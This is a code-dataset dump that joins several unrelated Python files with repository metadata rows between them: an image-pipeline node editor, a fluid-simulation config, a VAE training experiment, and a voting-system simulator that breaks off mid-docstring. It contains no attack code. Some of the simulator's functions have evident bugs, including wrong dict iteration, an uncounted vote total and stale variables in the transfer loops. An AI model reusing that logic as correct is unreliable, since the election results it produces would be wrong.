        line_id: Index of the line in the module-level ``lines`` list.
        data: Permutation of node indices; ``data[k]`` is the old index of
            the node that should end up at position ``k``.

    Returns:
        True on success, False if *data* does not cover every node.
    """
    logger.debug('create_image_reorder data=%s', data)
    nodes = lines[line_id].nodes
    # Fix: compare against the node count; the original compared against
    # len() of the _Line namedtuple (always 3 fields).
    if len(data) != len(nodes):
        return False
    # Fix: _Line is a namedtuple, so its 'nodes' attribute cannot be
    # rebound (the original raised AttributeError) and indexing the record
    # accessed its fields, not the nodes. Reorder the mutable list in place.
    nodes[:] = [nodes[i] for i in data]
    return True
def create_image_delete(line_id: int, position: int) -> int:
    """Remove the node at *position* from the given in-memory line."""
    logger.debug('patch_create_image line_id=%s, position=%s', line_id, position)
    target = lines[line_id]
    del target.nodes[position]
    return True
def get_image(line_id: int, last_node_id: int = None) -> bytes:
    """Run a line's processing pipeline and return the result as JPEG bytes.

    Args:
        line_id: Id of the persisted line to render.
        last_node_id: If given, only the first `last_node_id` nodes of the
            pipeline are applied (preview up to that node).

    Returns:
        The processed image, JPEG-encoded.
    """
    logger.debug('get_image id=%s last_node=%s', line_id, last_node_id)
    line = LineORM.find_by_id(line_id)
    # Work on a copy so the ORM-backed node list is never mutated.
    use_nodes: list = line.nodes[:]
    if last_node_id is not None:
        use_nodes = use_nodes[:last_node_id]
    # Every pipeline starts from the same base image.
    img_loc = cv2.imread('images/_default.jpg')
    for node in use_nodes:
        # Each node names a processing function plus its input parameters.
        func = FunctionFactory.get_function(node['name'])
        func.set_inputs(node['inputs'] if 'inputs' in node else {})
        img_loc = func.run(img_loc)
    # NOTE(review): is_success is ignored; a failed encode would return
    # invalid bytes.
    is_success, buffer_array = cv2.imencode('.jpg', img_loc)
    return buffer_array.tobytes()
def get_line(line_id: int) -> list[dict]:
    """Return the node descriptions of the given in-memory line."""
    target = lines[line_id]
    return target.nodes
def get_lines_node_numbers() -> list[int]:
    """Return the node count of every in-memory line, in order.

    Fix: the original annotated the return as list[dict], but the values
    are plain node counts (ints).
    """
    return [len(line.nodes) for line in lines]
def lines_to_model() -> list[models.Line]:
    """Map every persisted LineORM row to its API model."""
    return [mapLineOrmToModel(row) for row in LineORM.query.all()]
def time_ms() -> int:
    """Current wall-clock time in whole milliseconds."""
    return time.time_ns() // 1_000_000
def add_line(line: models.Line) -> models.Line:
    """Persist a new line and return its stored representation."""
    stored = mapLineModelToOrm(line).insert()
    return mapLineOrmToModel(stored)
def delete_line(line_id: int) -> None:
    """Delete the persisted line with the given id."""
    LineORM.find_by_id(line_id).delete()
def nodes_to_model(line_id: int) -> list[models.Node]:
    """Map the stored nodes of a line to API Node models (id == position)."""
    stored = LineORM.find_by_id(line_id).nodes
    return [
        models.Node(id=idx, position=idx, name=n['name'], inputs=n['inputs'])
        for idx, n in enumerate(stored)
    ]
def add_node(line_id: int, node: models.Node) -> None:
    """Insert *node* into the persisted line at node.position."""
    row = LineORM.find_by_id(line_id)
    # Copy so the ORM only sees the finished list on assignment.
    updated = row.nodes[:]
    updated.insert(node.position, {'name': node.name, 'inputs': node.inputs})
    row.last_change = time_ms()
    row.nodes = updated
    row.update()
def put_node(line_id: int, node_id: int, node: models.Node) -> None:
    """Replace the node at *node_id*, re-inserting *node* at node.position."""
    row = LineORM.find_by_id(line_id)
    # Copy so the ORM only sees the finished list on assignment.
    updated = row.nodes[:]
    del updated[node_id]
    updated.insert(node.position, {'name': node.name, 'inputs': node.inputs})
    row.last_change = time_ms()
    row.nodes = updated
    row.update()
def delete_node(line_id: int, node_id: int) -> None:
    """Remove the node at *node_id* from the persisted line."""
    row = LineORM.find_by_id(line_id)
    # Copy so the ORM only sees the finished list on assignment.
    updated = row.nodes[:]
    del updated[node_id]
    row.last_change = time_ms()
    row.nodes = updated
    row.update()
| 3,570 | 0 | 437 |
7decaa503e64ac854bcd7f073e2475e1fe4b741a | 159 | py | Python | config/config2D/scene_config/scene_jit2D.py | Jack12xl/a-toy-fluid-engine | 45ce4007ce6e804dcfdee8da307e131c9c3e7c7d | [
"MIT"
] | 21 | 2020-09-17T10:51:55.000Z | 2022-03-15T20:27:00.000Z | config/config2D/scene_config/scene_jit2D.py | Jack12xl/a-toy-fluid-engine | 45ce4007ce6e804dcfdee8da307e131c9c3e7c7d | [
"MIT"
] | 8 | 2020-09-18T08:52:34.000Z | 2021-02-07T09:27:49.000Z | config/config2D/scene_config/scene_jit2D.py | Jack12xl/myFluid | 45ce4007ce6e804dcfdee8da307e131c9c3e7c7d | [
"MIT"
] | 1 | 2020-09-20T11:10:35.000Z | 2020-09-20T11:10:35.000Z | import taichi as ti
import numpy as np
m_fluid_color = ti.Vector(list(np.random.rand(3) * 0.7 + 0.3))
m_dye_decay = 0.99
m_f_gravity = ti.Vector([0.0, -9.8]) | 22.714286 | 62 | 0.691824 | import taichi as ti
import numpy as np
m_fluid_color = ti.Vector(list(np.random.rand(3) * 0.7 + 0.3))  # random RGB, each channel in [0.3, 1.0)
m_dye_decay = 0.99  # dye attenuation factor (presumably applied per step -- confirm in solver)
m_f_gravity = ti.Vector([0.0, -9.8]) | 0 | 0 | 0 |
ad17f082f6fc9582bc3f0e858d696cbe52aa5dc5 | 11,427 | py | Python | experiment.py | ClaartjeBarkhof/PyTorch-VAE | a1ac49015c306b1cfc0d4d797669b17044f0a1eb | [
"Apache-2.0"
] | null | null | null | experiment.py | ClaartjeBarkhof/PyTorch-VAE | a1ac49015c306b1cfc0d4d797669b17044f0a1eb | [
"Apache-2.0"
] | null | null | null | experiment.py | ClaartjeBarkhof/PyTorch-VAE | a1ac49015c306b1cfc0d4d797669b17044f0a1eb | [
"Apache-2.0"
] | null | null | null | import os
import math
import torch
from torch import optim
from models import BaseVAE
from models.types_ import *
from utils import data_loader
import pytorch_lightning as pl
from torchvision import transforms
import torchvision.utils as vutils
from torchvision.datasets import CelebA
from torch.utils.data import DataLoader
import matplotlib.pyplot as plt
import numpy as np
# def sample_images(self):
# # Get sample reconstruction image
# test_input, test_label = next(iter(self.trainer.datamodule.test_dataloader()))
# test_input = test_input.to(self.curr_device)
# test_label = test_label.to(self.curr_device)
# # test_input, test_label = batch
# recons = self.model.generate(test_input, labels = test_label)
# vutils.save_image(recons.data,
# os.path.join(self.logger.log_dir ,
# "Reconstructions",
# f"recons_{self.logger.name}_Epoch_{self.current_epoch}.png"),
# normalize=True,
# nrow=12)
# try:
# samples = self.model.sample(144,
# self.curr_device,
# labels = test_label)
# vutils.save_image(samples.cpu().data,
# os.path.join(self.logger.log_dir ,
# "Samples",
# f"{self.logger.name}_Epoch_{self.current_epoch}.png"),
# normalize=True,
# nrow=12)
# except Warning:
# pass
| 41.857143 | 165 | 0.505032 | import os
import math
import torch
from torch import optim
from models import BaseVAE
from models.types_ import *
from utils import data_loader
import pytorch_lightning as pl
from torchvision import transforms
import torchvision.utils as vutils
from torchvision.datasets import CelebA
from torch.utils.data import DataLoader
import matplotlib.pyplot as plt
import numpy as np
class VAEXperiment(pl.LightningModule):
    """PyTorch-Lightning experiment wrapper around a BaseVAE model.

    Handles the optimization loop (loss computation and logging), periodic
    image sampling at the end of validation, and optimizer/scheduler setup.

    Args:
        vae_model: The VAE implementation to train.
        params: Experiment hyper-parameters: 'LR', 'weight_decay',
            'kld_weight', plus the optional keys probed below.
    """

    def __init__(self,
                 vae_model: BaseVAE,
                 params: dict) -> None:
        super(VAEXperiment, self).__init__()

        self.model = vae_model
        self.params = params
        self.curr_device = None
        self.hold_graph = False
        # 'retain_first_backpass' is optional; default to False when absent.
        try:
            self.hold_graph = self.params['retain_first_backpass']
        except KeyError:
            pass

    def forward(self, input: Tensor, **kwargs) -> Tensor:
        """Delegate the forward pass to the wrapped VAE."""
        return self.model(input, **kwargs)

    def training_step(self, batch, batch_idx, optimizer_idx=0):
        """Compute and log the training loss terms for one batch."""
        real_img, labels = batch
        self.curr_device = real_img.device

        results = self.forward(real_img, labels=labels)
        train_loss = self.model.loss_function(*results,
                                              M_N=self.params['kld_weight'],
                                              optimizer_idx=optimizer_idx,
                                              batch_idx=batch_idx)

        self.log_dict({key: val.item() for key, val in train_loss.items()},
                      sync_dist=True)
        return train_loss['loss']

    def validation_step(self, batch, batch_idx, optimizer_idx=0):
        """Compute and log the validation loss terms for one batch."""
        real_img, labels = batch
        self.curr_device = real_img.device

        results = self.forward(real_img, labels=labels)
        # M_N=1.0: no KLD re-weighting at validation time.
        val_loss = self.model.loss_function(*results,
                                            M_N=1.0,
                                            optimizer_idx=optimizer_idx,
                                            batch_idx=batch_idx)

        self.log_dict({f"val_{key}": val.item() for key, val in val_loss.items()},
                      sync_dist=True)

    def on_validation_end(self) -> None:
        self.sample_images()

    def sample_images(self):
        """Save image grids of model samples and reconstructions.

        One grid of unconditional samples and one of reconstructions of a
        test batch are written under the logger's 'Samples' and
        'Reconstructions' directories for the current epoch.
        """
        test_input, _ = next(iter(self.trainer.datamodule.test_dataloader()))
        test_input = test_input.to(self.curr_device)
        B, C, W, H = test_input.shape

        # 'generate' reconstructs its input despite the name.
        recons = self.model.generate(test_input).cpu()
        # Keep batch-norm layers in train mode while sampling.
        self.model.train()
        samples = self.model.sample(B, self.curr_device).cpu()

        ncols = 12
        nrows = int(np.ceil(B / ncols))
        subplot_wh = 0.75

        if C == 3:
            # Colour: channels-last, rescale from [-1, 1] to uint8 [0, 255].
            samples = samples.permute(0, 2, 3, 1)
            recons = recons.permute(0, 2, 3, 1)
            samples = (samples + 1) * (255 / 2)
            recons = (recons + 1) * (255 / 2)
            samples = samples.clamp(0, 255).to(torch.uint8).cpu().numpy()
            recons = recons.clamp(0, 255).to(torch.uint8).cpu().numpy()
        else:
            # Greyscale: drop the channel axis, keep the raw value range.
            samples = samples.numpy()
            recons = recons.numpy()
            samples = np.transpose(samples, axes=(0, 2, 3, 1)).squeeze(-1)
            recons = np.transpose(recons, axes=(0, 2, 3, 1)).squeeze(-1)

        self._save_grid(
            samples, C, nrows, ncols, subplot_wh,
            os.path.join(self.logger.log_dir, "Samples",
                         f"{self.logger.name}_Epoch_{self.current_epoch}.png"))
        self._save_grid(
            recons, C, nrows, ncols, subplot_wh,
            os.path.join(self.logger.log_dir, "Reconstructions",
                         f"recons_{self.logger.name}_Epoch_{self.current_epoch}.png"))

    def _save_grid(self, images, channels, nrows, ncols, subplot_wh, path):
        """Plot *images* as an nrows x ncols grid and save it to *path*.

        NOTE(review): assumes nrows >= 2, otherwise plt.subplots returns a
        1-D axes array and axs[r, c] fails -- confirm batch size >= 13.
        """
        fig, axs = plt.subplots(ncols=ncols, nrows=nrows,
                                figsize=(ncols * subplot_wh, nrows * subplot_wh))
        for im_idx in range(images.shape[0]):
            c = im_idx % ncols
            r = im_idx // ncols
            if channels == 1:
                axs[r, c].imshow(images[im_idx], cmap="Greys")
            else:
                axs[r, c].imshow(images[im_idx])
            axs[r, c].axis("off")
        plt.subplots_adjust(wspace=0.1, hspace=0.1)
        plt.tight_layout()
        plt.savefig(path, dpi=75, bbox_inches='tight')
        # Close the figure so repeated epochs don't leak matplotlib state
        # (the original left every figure open).
        plt.close(fig)

    def configure_optimizers(self):
        """Build the Adam optimizer(s) and optional exponential schedulers.

        A second optimizer targeting params['submodel'] is added when 'LR_2'
        is set (used for adversarial training); schedulers are added when
        'scheduler_gamma' (and optionally 'scheduler_gamma_2') is set.
        """
        optims = []
        scheds = []

        optims.append(optim.Adam(self.model.parameters(),
                                 lr=self.params['LR'],
                                 weight_decay=self.params['weight_decay']))

        # Optional second optimizer for a named sub-module.
        if self.params.get('LR_2') is not None:
            optims.append(optim.Adam(
                getattr(self.model, self.params['submodel']).parameters(),
                lr=self.params['LR_2']))

        if self.params.get('scheduler_gamma') is not None:
            scheds.append(optim.lr_scheduler.ExponentialLR(
                optims[0], gamma=self.params['scheduler_gamma']))
            # A second scheduler only makes sense with a second optimizer
            # (the original could hit IndexError here and silently swallow it).
            if len(optims) > 1 and self.params.get('scheduler_gamma_2') is not None:
                scheds.append(optim.lr_scheduler.ExponentialLR(
                    optims[1], gamma=self.params['scheduler_gamma_2']))
            return optims, scheds
        # Preserve the original contract: no scheduler -> return only optims.
        return optims
f2402356296748d055dd98cf85fde7497edb18e5 | 51,002 | py | Python | voting-simulator/district.py | S8A/voting-simulator | c39a57b096472348e7be507820d42d4970b03276 | [
"MIT"
] | null | null | null | voting-simulator/district.py | S8A/voting-simulator | c39a57b096472348e7be507820d42d4970b03276 | [
"MIT"
] | null | null | null | voting-simulator/district.py | S8A/voting-simulator | c39a57b096472348e7be507820d42d4970b03276 | [
"MIT"
] | null | null | null | # coding=utf-8
"""A district is the voter population of a constituency or geographical area."""
import itertools as itls
import math as m
import random as rd
from .utils import generate_voter_groups, sort_dict_desc, make_table
from .candidate import Candidate
from .party import Party
from .voter_group import VoterGroup
from .result import ElectionResult
| 44.85664 | 81 | 0.598977 | # coding=utf-8
"""A district is the voter population of a constituency or geographical area."""
import itertools as itls
import math as m
import random as rd
from .utils import generate_voter_groups, sort_dict_desc, make_table
from .candidate import Candidate
from .party import Party
from .voter_group import VoterGroup
from .result import ElectionResult
class District:
def __init__(self, name, total_voters, voter_groups=[]):
"""Creates a voting district with the given number of voters.
Args:
name: Name of the district.
total_voters: Total number of voters in the district.
voter_groups: Optional list of voter groups to account for,
instead of generating all possible voter groups.
"""
self.name = name
self.total_voters = total_voters
self.voter_groups = voter_groups
self.voter_map = {}
self.generate_voter_map()
def __repr__(self):
"""Returns a string representation of the voting district."""
return f'{self.name} ({self.total_voters} voters)'
def summary(self):
"""Returns a summary of the district."""
summary = [f'{self} :.\n']
summary.extend(self.voter_map_table())
return '\n'.join(summary)
def voter_map_table(self):
"""Returns the voter map as a text table."""
widths = [50, 20, 10]
header = ['Voter group', 'Voters', 'Percent']
sorted_voter_groups = sort_dict_desc(self.voter_map)
body = [[vg, count, f'{100.0 * count / self.total_voters :.2f}%']
for vg, count in sorted_voter_groups]
return make_table(widths, header, body)
def generate_voter_map(self):
"""Generates a random map of voter groups to number of voters."""
# Use list of voter groups if given
voter_groups = self.voter_groups
# If not, generate all possible voter groups
if not voter_groups:
voter_groups = generate_voter_groups()
# Initialize voter map
voter_map = {vg: 0 for vg in voter_groups}
# Remaining number of voters to distribute
remaining = self.total_voters
# Maximum number of voters per group: 40% of total voters
max_voters = round(0.4 * self.total_voters)
# Fill voter map
for i, vg in enumerate(voter_groups):
if i == len(voter_groups) - 1:
# If this is the last voter group, assign remaining voters
voter_map[vg] = remaining
else:
# Otherwise, assign this voter group a random number of voters
# between zero and either the maximum number of voters per
# group or the number of remaining voters to distribute,
# whichever is bigger
voter_map[vg] = rd.randint(0, max(max_voters, remaining))
remaining -= voter_map[vg]
return voter_map
def generate_block_ballots(self, n, candidates, randomize):
"""Generates block voting ballots.
Each ballot must have exactly n candidates. Each voter group fills
their ballots with candidates of their preferred party, then from their
second preferred party, and so on as needed to fill their ballots. The
order of selection may be randomized or not.
Args:
n: Number of votes per ballot.
candidates: List of candidates. Assumed to be larger than n.
randomize: If true, the candidates of each party are shuffled
before selection when constructing the ballots.
Returns:
A list of tuples, containing each voter group's ballot and number
of voters. Each ballot is a list of candidates.
"""
ballots = []
# Fill ballots by voter group
for voter_group, voters in self.voter_map.items():
ballot = []
# Loop through each party in order of preference
for party in voter_group.preferences:
# Stop if there are no votes left
if len(ballot) >= n:
break
# Get party candidates and shuffle them if required
choices = [c for c in candidates if c.party == party]
if randomize:
rd.shuffle(choices)
# Add as many candidates as needed to try to fill the ballot
ballot.extend(choices[0:n])
# Add ballot to list
ballots.append((ballot, voters))
return ballots
def generate_ranked_ballots(self, n, candidates, randomize):
"""Generates a ranked ballot for each voter group.
Each ballot must rank exactly n candidates. Each voter group chooses
and ranks the candidates as follows: the first rank goes to a candidate
of their preferred party, the second rank goes to a candidate chosen at
random from any of their two most preferred parties, and so on until
the ballot is full.
Args:
n: Number of ranks per ballot.
candidates: List of candidates. Assumed to be larger than n.
randomize: If true, the selection of candidates is randomized on
each ballot.
Returns:
A list of tuples, containing each voter group's ballot and number
of voters. Each ballot is a list of candidates ranked in order of
preference.
"""
ballots = []
# Fill ballots by voter group
for voter_group, voters in self.voter_map.items():
ranked_ballot = []
# Add candidates to the ballot until it's full
for k in range(n):
# Select the first k+1 parties in order of preference
parties = voter_group.preferences[0:k+1]
# Extract a candidate from each party
# If randomize=True, choose at random
choices = []
for p in parties:
party_list = [c for c in candidates
if c.party == p and c not in ranked_ballot]
if randomize:
choices.append(rd.choice(party_list))
else:
choices.append(party_list[0])
# Select a candidate and add to ranking
candidate = rd.choice(choices) if randomize else choices[-1]
ranked_ballot.append(candidate)
# Add finished ballot to list
ballots.append((ranked_ballot, voters))
return ballots
def generate_score_ballots(self, n, candidates, min_score, max_score,
randomize):
"""Generates a score ballot for each voter group.
Each ballot must score exactly n candidates. Each voter group gives
the maximum score to a candidate of the party they most like, and the
minimum score to a candidate of the party they least like. Random
scores lower than the maximum are set for other candidates to fill
the ballot, but with higher probability of higher scores for candidates
of more preferred parties.
Because the scores of the intermediate candidates are always random,
this function does not guarantee reproducibility for n > 2 even if
randomize=False, which only affects the selection of the candidates.
Args:
n: Number of candidates per ballot. Assumed to be two or more.
candidates: List of candidates. Assumed to be larger than n.
min_score: Minimum score of the range.
max_score: Maximum score of the range. Assumed to be greater than
or equal to min_score.
randomize: If true, the selection of candidates is randomized on
each ballot.
Returns:
A list of tuples, containing each voter group's ballot and number
of voters. Each ballot is represented as a dictionary mapping
candidates to their corresponding score.
"""
ballots = []
# Fill ballots by voter group
for voter_group, voters in self.voter_map.items():
prefs = voter_group.preferences
scores = {}
# Add candidates to the ballot until it's full
for k in range(n):
if k == 0:
# Give highest score to a candidate from the voter group's
# most-preferred party (MPP)
mpp = [c for c in candidates if c.party == prefs[0]]
highest_scored = rd.choice(mpp) if randomize else mpp[0]
# Add to ballot
scores[highest_scored] = max_score
elif k == 1:
# Give lowest score to a candidate from the voter group's
# least-preferred party (LPP)
lpp = [c for c in candidates
if c.party == prefs[-1] and c not in scores.keys()]
lowest_scored = rd.choice(lpp) if randomize else mpp[0]
# Add to ballot
scores[lowest_scored] = min_score
else:
# Select the first k-1 parties in order of preference
# Using k-1 instead of k to account for last candidate
# already scored
parties = prefs[0:k-1]
# Extract a candidate from each party
# If randomize=True, choose at random
choices = []
for p in parties:
party_list = [
c for c in candidates
if c.party == p and c not in scores.keys()]
if randomize:
choices.append(rd.choice(party_list))
else:
choices.append(party_list[0])
# Select a candidate
candidate = rd.choice(choices) if randomize else choices[-1]
# Preference factor for the candidate's party
party_index = prefs.index(candidate.party)
pref_factor = 1 - (party_index / len(prefs))
# Choose a random score using a triangular distribution
# and the preference factor to vary the mode
mode = round(pref_factor * (max_score - 1))
score = rd.triangular(min_score, max_score - 1, mode)
# Add to ballot
scores[candidate] = score
# Add ballot to list
ballots.append((scores, voters))
return ballots
def simulate_ntv(self, n, seats, candidates, randomize=False):
"""Simulates a generic non-transferable vote system.
This function is a template for single non-transferable vote (SNTV),
first-past-the-post (FPTP), multiple non-transferable vote (MNTV), and
limited voting electoral systems.
This function doesn't account for tactical voting, which may have a
huge impact on real life uses of these voting systems.
Args:
n: Number of available votes per ballot.
seats: Number of seats to fill.
candidates: List of candidates.
randomize: Randomize selection or not.
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NoSeatsToFillError: If there number of seats given is less than 1.
NotEnoughCandidatesError: If the list of candidates is too short.
"""
if seats < 1:
raise NoSeatsToFillError
if len(candidates) <= 1 or seats > len(candidates):
raise NotEnoughCandidatesError
# Generate block vote ballots
# Each voter group votes in order of party preference
ballots = self.generate_block_ballots(n, candidates, randomize)
# Count votes
counts = {c: 0 for c in candidates}
for ballot, votes in ballots:
for candidate in ballot:
counts[candidate] += votes
# The winners are chosen by vote count in descending order,
# until all seats are filled
winners = [c for c, v in sort_dict_desc(counts)[0:seats]]
# Prepare result
name = 'Non-transferable vote (NTV)'
details = [f'{n} votes per ballot',
f'{seats} seats',
f'{len(candidates)} candidates']
if randomize:
details.append('Randomized ballot generation')
result = ElectionResult(name, counts, winners, details=details)
return result
def simulate_sntv(self, seats, candidates, randomize=False):
"""Simulates single non-transferable vote or multi-member plurality.
SNTV is a plurality voting system for multiple seat elections. Each
voter votes for a single candidate. If there are n seats to fill,
the n candidates with the most votes win.
This function doesn't account for tactical voting, which may have a
huge impact on real life uses of this voting system.
Args:
seats: Number of seats to fill.
candidates: List of candidates.
randomize: Randomize candidate selection or not.
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NoSeatsToFillError: If there number of seats given is less than 1.
NotEnoughCandidatesError: If the list of candidates is too short.
"""
# Get result: multiple-seat, single-vote NTV
result = self.simulate_ntv(1, seats, candidates, randomize=randomize)
# Change name
result.voting_system = 'Single non-transferable vote (SNTV)'
# Remove votes per ballot line
del result.details[0]
return result
def simulate_fptp(self, candidates, randomize=False):
"""Simulates first-past-the-post voting or single-member plurality.
FPTP is a plurality voting system for single seat elections. It's a
single-seat version of SNTV: each voter votes for a single candidate,
and then the candidate with the most votes in total wins.
This function doesn't account for tactical voting, which may have a
huge impact on real life uses of this voting system.
Args:
candidates: List of candidates.
randomize: Randomize selection or not.
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NotEnoughCandidatesError: If the list of candidates is too short.
"""
# Get result: single-seat SNTV
result = self.simulate_sntv(1, candidates)
# Change name
result.voting_system = 'First-past-the-post (FPTP)'
# Remove number of seats line
del result.details[0]
return result
def simulate_mntv(self, seats, candidates, randomize=False):
"""Simulates multiple non-transferable vote or block vote.
MNTV is a plurality voting system for multiple seat elections. If
there are n seats to fill, each voter selects up to n candidates, and
then the n candidates with the most votes win.
This function doesn't account for tactical voting, which may have a
huge impact on real life uses of this voting system.
Args:
seats: Number of seats to fill.
candidates: List of candidates.
randomize: Randomize selection or not.
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NoSeatsToFillError: If there number of seats given is less than 1.
NotEnoughCandidatesError: If the list of candidates is too short.
"""
# Get result: multiple-seat, multiple-vote NTV
result = self.simulate_ntv(seats, seats, candidates, randomize=randomize)
# Change name
result.voting_system = 'Multiple non-transferable vote (MNTV)'
return result
def simulate_limited_voting(self, seats, candidates, randomize=False):
"""Simulates limited voting.
Limited voting is a plurality voting system for multiple seat
elections. Voters have fewer votes than there are seats available, and
then the candidates with the most votes win those seats.
This function doesn't account for tactical voting, which may have a
huge impact on real life uses of this voting system.
In this implementation, the number of votes per ballot is set to
be a random number between 5 and 10, but never exceeding the number
of seats to fill minus one.
Args:
seats: Number of seats to fill.
candidates: List of candidates.
randomize: Randomize selection or not.
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NoSeatsToFillError: If there number of seats given is less than 1.
NotEnoughCandidatesError: If the list of candidates is too short.
"""
# Number of votes per ballot
n = min(rd.randint(5, 10), seats - 1)
# Get result: multiple-seat, fewer-votes-than-seats NTV
result = self.simulate_ntv(n, seats, candidates, randomize=randomize)
# Change name
result.voting_system = 'Limited voting'
return result
def simulate_trs(self, candidates, randomize=False):
"""Simulates two-round system or runoff voting.
TRS is a two-round majority voting system for single seat elections.
Each voter votes for a single candidate. If any candidate gets a
majority of votes on the first round, she's the winner. Otherwise,
the two candidates with the most votes move on to the second round.
The voters vote again, and the winner is the candidate with the most
votes (which must be a majority, because they're only two).
This implementation makes each voter group vote for a candidate of
their preferred party on the first round, and the candidate they prefer
the most on the second round. Tactical voting in this system is a lot
less intense than in FPTP, but it still exists in real life and it's
not accounted for by this function. This function also assumes that
each voter group's preferences remain the same between voting rounds,
making it equivalent to a contingent vote system.
Args:
candidates: List of candidates.
randomize: Randomize selection or not.
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NotEnoughCandidatesError: If the list of candidates is too short.
"""
if len(candidates) <= 1:
raise NotEnoughCandidatesError
# Generate single vote ballots
# Each voter group votes in order of party preference
ballots = self.generate_block_ballots(1, candidates, randomize)
# Count votes for the first round
counts = {c: 0 for c in candidates}
total_votes = 0
for ballot, votes in ballots:
candidate = ballot[0]
counts[candidate] += votes
# Check if a majority was reached
majority_reached = False
for candidate, votes in counts:
if votes > 0.5 * total_votes:
majority_reached = True
break
# If there's no majority, move on to the second round
if not majority_reached:
# Keep only the top two candidates from the previous round
a, b = [c for c, v in sort_dict_desc(counts)[0:2]]
# Make each voter group choose the one they prefer
ballots = self.generate_block_ballots(1, [a, b], randomize)
# Reset and count votes for the finalists
counts = {a: 0, b: 0}
for ballot, votes in ballots:
candidate = ballot[0]
counts[candidate] += votes
# The winner is the candidate with the majority in the end
winner = sort_dict_desc(counts)[0][0]
# Prepare result
name = 'Two-round system (TRS)'
details = [f'{len(candidates)} initial candidates']
if randomize:
details.append('Randomized ballot generation')
result = ElectionResult(name, counts, [winner], details=details)
return result
def simulate_stv(self, seats, candidates, droop_quota=True,
surplus_transfers=True, randomize=False):
"""Simulates single transferable vote.
STV is a ranked voting system that approximates proportional
representation in multiple seat elections. Each voter ranks the
candidates in order of preference (perhaps with a maximum number of
rankings). The vote goes to the voter's first preference if possible,
but if their first preference is eliminated, instead of being thrown
away, the vote is transferred to their next available preference.
The counting process works thus: votes are totalled, and a quota (the
minimum number of votes required to win a seat) is derived. If the
voter's first-ranked candidate achieves the quota, the candidate is
declared elected; and, in some STV systems, any surplus vote is
transferred to other candidates in proportion to the next back-up
preference marked on the ballots. If more candidates than seats remain,
the candidate with the fewest votes is eliminated, with the votes in
their favour being transferred to other candidates as determined by the
voters' next back-up preference. These elections and eliminations, and
vote transfers if applicable, continue until enough candidates exceed
quota to fill all the seats or until there are only as many remaining
candidates as there are unfilled seats, at which point the remaining
candidates are declared elected.
Alternatively, there's a simpler method that uses only elimination
transfers: sequentially identify the candidate with the least support,
eliminate that candidate, and transfer those votes to the next-named
candidate on each ballot. This process is repeated until there are
only as many candidates left as seats available.
This function implements the STV process with and without quotas, and
with or without surplus transfers. The number of ranks of every ballot
is set to be the maximum between 5 and 1.5 times the number of seats
to be filled, but never exceeding the number of available candidates.
Args:
seats: Number of seats to fill.
candidates: List of candidates.
droop_quota: Use the Droop quota or not.
surplus_transfers: Transfer surplus votes or not.
randomize: Randomize selection or not.
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
NoSeatsToFillError: If there number of seats given is less than 1.
NotEnoughCandidatesError: If the list of candidates is too short.
"""
if seats < 1:
raise NoSeatsToFillError
if len(candidates) <= 1 or seats > len(candidates):
raise NotEnoughCandidatesError
# Ballot size
n = min(max(round(1.5 * seats), 5), len(candidates))
# Generate ranked ballots for each voter group
ballots = self.generate_ranked_ballots(n, candidates, randomize)
# Count first choices
counts = {c: 0 for c in candidates}
total_votes = 0
for ranking, votes in ballots:
first_choice = ranking[0]
counts[first_choice] += votes
total_votes += votes
# Calculate quota if required
quota = None
if droop_quota:
quota = m.floor(total_votes / (seats + 1)) + 1
# Count and transfer votes until all seats are filled
winners = []
while len(winners) < seats:
# Get remaining candidates
remaining = [(c, v) for c, v in sort_dict_desc(counts)
if c not in winners and v > 0]
# If there are two remaining candidates in a single-seat election,
# mark winner and end process right away, to have more than one
# candidate in the vote counts table
if seats == 1 and len(remaining) == 2:
winner = remaining[0][0]
winners.append(winner)
break
# If the number of remaining candidates is equal to
# the number of seats, fill seats and stop the process
if len(remaining) == seats:
for candidate, votes in remaining:
winners.append(candidate)
break
# Check if any remaining candidate reached the quota (if any)
reached_quota = False
if droop_quota:
for candidate, votes in remaining:
if votes >= quota:
reached_quota = True
# Candidate is elected
winners.append(candidate)
# Remove candidate from the ballots
for r, v in ballots:
r.remove(candidate)
# Remove surplus votes from candidate's vote count
surplus = votes - quota
counts[candidate] -= surplus
# If required, transfer surplus votes
if surplus_transfers and surplus > 0:
# Find the next choice candidate in all ballots
# that have this candidate as first choice
next_choices = {}
for r, v in ballots:
if r[0] == candidate:
next_choice = r[1]
next_choices[next_choice] = (
next_choices.get(next_choice, 0) + v)
# Distribute surplus evenly among next choices
ratio = surplus / votes
for c, v in next_choices:
new_votes = v * ratio
counts[c] += m.floor(new_votes)
surplus -= new_votes
# If no candidate reached the quota (or not using it)
if not reached_quota:
# Eliminate the least favored candidate (LFC)
lfc = remaining[-1][0]
counts[lfc] = 0
# Find the next choice candidate of each voter group that
# supported the LFC and remove the LFC from each ranking
next_choices = {}
for r, v in ballots:
if r[0] == lfc:
next_choice = r[1]
next_choices[next_choice] = (
next_choices.get(next_choice, 0) + v)
r.remove(lfc)
# Distribute LFC votes among next choices
for c, v in next_choices:
counts[c] += v
# Remove candidate from the ballots
for r, v in ballots:
r.remove(candidate)
# Prepare result
name = 'Single transferable vote (STV)'
details = [f'({seats} seats',
f'{len(candidates)} candidates',
f'{n} ranks per ballot']
if randomize:
details.append('Randomized ballot generation')
if droop_quota:
method = 'Using Droop quota'
if surplus_transfers:
method += ' with surplus transfers'
else:
method += ' without surplus transfers'
details.append(method)
else:
details.append('Elimination transfers only')
result = ElectionResult(name, counts, winners, details=details)
return result
def simulate_irv(self, candidates, randomize=False):
"""Simulates instant-runoff voting.
IRV is a ranked voting system for single seat elections. Each
voter ranks the candidates in order of preference (perhaps with a
maximum number of rankings). Ballots are initially counted for each
voter's top choice. If a candidate has more than half of the vote
based on first-choices, that candidate wins. If not, then the
candidate with the fewest votes is eliminated. The voters who
selected the defeated candidate as a first choice then have their
votes added to the totals of their next choice. This process
continues until a candidate has more than half of the votes. When
the field is reduced to two, it has become an "instant runoff" that
allows a comparison of the top two candidates head-to-head.
It's equivalent to a single-seat STV using the eliminations-only
method, and this function implements it that way.
Args:
candidates: List of candidates.
randomize: Randomize selection or not.
Returns:
ElectionResult object containing the results of the electoral
process and other relevant information.
Raises:
